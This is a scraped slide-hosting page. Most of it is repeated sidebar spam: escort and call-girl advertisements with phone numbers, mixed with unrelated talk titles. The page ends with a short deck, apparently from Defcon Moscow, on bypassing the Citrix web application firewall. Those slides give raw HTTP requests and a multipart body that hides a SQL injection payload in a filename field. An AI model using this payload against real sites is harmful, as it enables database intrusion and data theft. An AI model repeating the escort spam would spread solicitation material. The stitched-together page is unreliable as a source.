Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceDelhi Call girls
 
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goa
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goahorny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goa
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goasexy call girls service in goa
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
SEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistSEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistKHM Anwar
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsstephieert
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.soniya singh
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 

Recently uploaded (20)

Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 22 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goa
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goahorny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goa
horny (9316020077 ) Goa Call Girls Service by VIP Call Girls in Goa
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
SEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistSEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization Specialist
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Radiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girlsRadiant Call girls in Dubai O56338O268 Dubai Call girls
Radiant Call girls in Dubai O56338O268 Dubai Call girls
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 

Citrix WAF bypass techniques exposed in daily hack report

  • 2. /whoami Defcon Moscow  You already know it about us  ???  PROFIT
  • 3. Daily hack Citrix WAF Bypass GET /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive
  • 4. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Length: 462 Citrix WAF Bypass
  • 5. Daily hack POST /vulnerable_script HTTP/1.1 Host: victim User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... citrix_ns_id_ ... Connection: keep-alive Content-Type: multipart/form-data; boundary=--------2125014176 Content-Length: 462 Citrix WAF Bypass
  • 6. Daily hack Citrix WAF Bypass ----------2125014176 Content-Disposition: form-data; name="vid" /***/ ----------2125014176 Content-Disposition: form-data; name="vid"; filename="999999' union select 'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- " 1 ----------2125014176-- http://bit.ly/1448cRr